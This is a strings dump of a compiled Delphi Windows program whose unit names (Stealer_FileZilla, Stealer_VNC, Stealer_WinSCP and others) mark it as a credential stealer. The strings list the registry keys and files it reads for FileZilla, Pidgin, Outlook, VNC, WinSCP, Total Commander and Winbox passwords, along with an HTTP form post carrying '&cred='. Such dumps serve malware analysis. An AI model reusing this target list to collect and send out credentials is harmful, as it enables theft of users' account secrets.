This program must be run under Win32
.idata
.edata
P.reloc
P.rsrc
StringX
TObjectd
TObjectX
System
IInterface
System
TInterfacedObject
YZ]_^[
Ht Ht.
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
ZTUWVSPRTj
_^[YY]
_^[YY]
tDhLV@
kernel32.dll
GetLongPathNameA
Software\Borland\Locales
Software\Borland\Delphi\Locales
_^[YY]
Exception
EHeapException
EOutOfMemory
EInOutError
EExternal
EExternalException
EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivide
EOverflow
EUnderflow
EInvalidPointer
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
EOSError
ESafecallException
SysUtils
SysUtils
TThreadLocalCounter
$TMultiReadExclusiveWriteSynchronizer
<*t"<0r=<9w9i
INFNAN
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
t%HtIHtm
_^[YY]
$Z]_^[
QQQQQQSVW3
QQQQQSVW
_^[YY]
TErrorRec
TExceptRec
$YZ]_^[
m/d/yy
mmmm d, yyyy
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
YZ]_^[
YZ]_^[
YZ]_^[
83825c0b5bab0732b1ef4b9d1f93bb55
9f8599;=07d5`6cd`5<
ea4bb7w=Ds
nkhz`q
QQQQQQQSVW
0x%.2x%.2x%.2x%.2x%.2x%.2x
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
!!!!<own>!
Winbox
abcdefghijklmnopqrstuvwxyz1234567890,.:@#$%^&*(){}~<>?
QQQQQQQSVW
\Mikrotik\Winbox\Addresses.cdb
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
TCustomVariantType
TCustomVariantTypeX
Variants
EVariantInvalidOpError
EVariantTypeCastError
EVariantOverflowError
EVariantInvalidArgError
EVariantBadVarTypeError
EVariantBadIndexError
EVariantArrayLockedError
EVariantArrayCreateError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantUnexpectedError|
EVariantDispatchError
QQQQSV
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
String
Array
ByRef
Variants
_^[YY]
EStreamError
EFileStreamError
EFCreateError
EFOpenError
EFilerErrorD
EReadError
EWriteError
EListError
EStringListError
TThreadListh
TPersistent
TPersistenth
Classes
IStringsAdapter
Classes
TStrings
TStrings<A
Classes
TStringItem
TStringList
TStringListl A
Classes
TStream
THandleStream
TFileStream
TRegGroup
TRegGroups
Strings
S$_^[Y]
_^[YY]
SdZ]_^[
$Z]_^[
_^[YY]
ERegistryException
TRegistryS
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Outlook
IMAP User
IMAP Password
POP3 User
POP3 Password
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
QQQQQQSVW
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
QQQQQQ
<Host>
</Host>
FileZilla
<User>
</User>
<Pass encoding="base64">
</Pass>
\FileZilla\sitemanager.xml
PSAPI.dll
EnumProcesses
EnumProcessModules
GetModuleBaseNameA
GetModuleFileNameExA
GetModuleBaseNameW
GetModuleFileNameExW
GetModuleInformation
EmptyWorkingSet
QueryWorkingSet
InitializeProcessForWsWatch
GetMappedFileNameA
GetDeviceDriverBaseNameA
GetDeviceDriverFileNameA
GetMappedFileNameW
GetDeviceDriverBaseNameW
GetDeviceDriverFileNameW
EnumDeviceDrivers
GetProcessMemoryInfo
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
\.purple\accounts.xml
\Wcx_ftp.ini
username=
password=
Local Settings\Software\Microsoft\Windows\Shell\MuiCache
\wcx_ftp.ini
\wcx_ftp.ini
SOFTWARE\RealVNC\vncserver\Password
SOFTWARE\RealVNC\vncserver\RfbPort
SOFTWARE\RealVNC\vncserver\HttpPort
RealVNC
SOFTWARE\RealVNC\WinVNC4\Password
SOFTWARE\RealVNC\WinVNC4\PortNumber
SOFTWARE\TightVNC\Server\Password
SOFTWARE\TightVNC\Server\RfbPort
SOFTWARE\TightVNC\Server\HttpPort
TightVNC
SOFTWARE\TightVNC\Server\PasswordViewOnly
QQQQQQQ3
SOFTWARE\TigerVNC\WinVNC4\Password
SOFTWARE\TigerVNC\WinVNC4\PortNumber
SOFTWARE\TigerVNC\WinVNC4\HTTPPortNumber
TigerVNC
QQQQSVW
HostName=
UserName=
Password=
WinSCP
\winscp.ini
WinScp
Local Settings\Software\Microsoft\Windows\Shell\MuiCache
winscp
QQQQQQQQ
Software\Martin Prikryl\WinSCP 2\Sessions\
\HostName
\UserName
\Password
WinSCP
Software\Martin Prikryl\WinSCP 2\Sessions
HTTP/1.1
Host:
Content-Length:
Content-Type: application/x-www-form-urlencoded
QQQQQQQS
&cred=
Runtime error at 00000000
0123456789ABCDEF
Qkkbal
;3+#>6.&
'2, /+0&7!4-)1#
0123456789ABCDEF
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
TlsFree
TlsAlloc
LocalFree
LocalAlloc
advapi32.dll
RegQueryValueExA
RegQueryInfoKeyA
RegOpenKeyExA
RegOpenKeyA
RegFlushKey
RegEnumValueA
RegEnumKeyA
RegEnumKeyExA
RegCreateKeyExA
RegCloseKey
OpenThreadToken
OpenProcessToken
IsValidSid
GetTokenInformation
GetSidSubAuthorityCount
GetSidSubAuthority
GetSidIdentifierAuthority
kernel32.dll
WriteFile
WideCharToMultiByte
WaitForSingleObject
VirtualQuery
SetLastError
SetFilePointer
SetEvent
SetEndOfFile
ResetEvent
ReadFile
OpenProcess
LocalFree
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
HeapFree
HeapAlloc
GetVersionExA
GetThreadLocale
GetStringTypeExA
GetStdHandle
GetProcessHeap
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentThread
GetCurrentProcess
GetCPInfo
GetACP
FormatMessageA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateMutexA
CreateFileA
CreateEventA
CompareStringA
CloseHandle
user32.dll
MessageBoxA
LoadStringA
GetSystemMetrics
CharNextA
CharUpperBuffA
CharToOemA
kernel32.dll
wsock32.dll
WSACleanup
WSAStartup
gethostname
gethostbyname
socket
inet_ntoa
connect
closesocket
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
crypt32.dll
CryptUnprotectData
cred.dll
TlHelp32
System
SysInit
KWindows
UTypes
Base64
8Registry
"RTLConsts
^Classes
SysConst
3Messages
SysUtils
CVariants
$VarUtils
QTypInfo
sActiveX
IniFiles
MiniReg64
Stealer_Var
Stealer_WinSCP
Stealer_VNC
WinSock
|Stealer_TotalCmd
Stealer_Pidgin
PStealer_FileZilla
rStealer_MSOutlook
Stealer_Winbox
UserSid
DVCLAL
PACKAGEINFO
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Stream read error
Failed to get data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Stream write error
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid property value
Invalid data type for '%s'
January
February
August
September
October
November
December
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
%sA call to an OS function failed
Variant or safe array is lockedInvalid variant type conversion
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant overflow
Invalid argument
Invalid variant type
Operation not supported
Unexpected variant error
External exception %x
Assertion failed
Interface not supported
Exception in safecall method
%s (%s, line %d)
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Access violation
Stack overflow
Control-C hit
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Write$Error creating variant or safe array)Variant or safe array index out of bounds
Out of memory
I/O error %d
File not found
Invalid filename
Too many open files
File access denied
Read beyond end of file
Disk full
Invalid numeric input
Division by zero
Range check error
Integer overflow Invalid floating point operationFloating point division by zero
Floating point overflow
Floating point underflow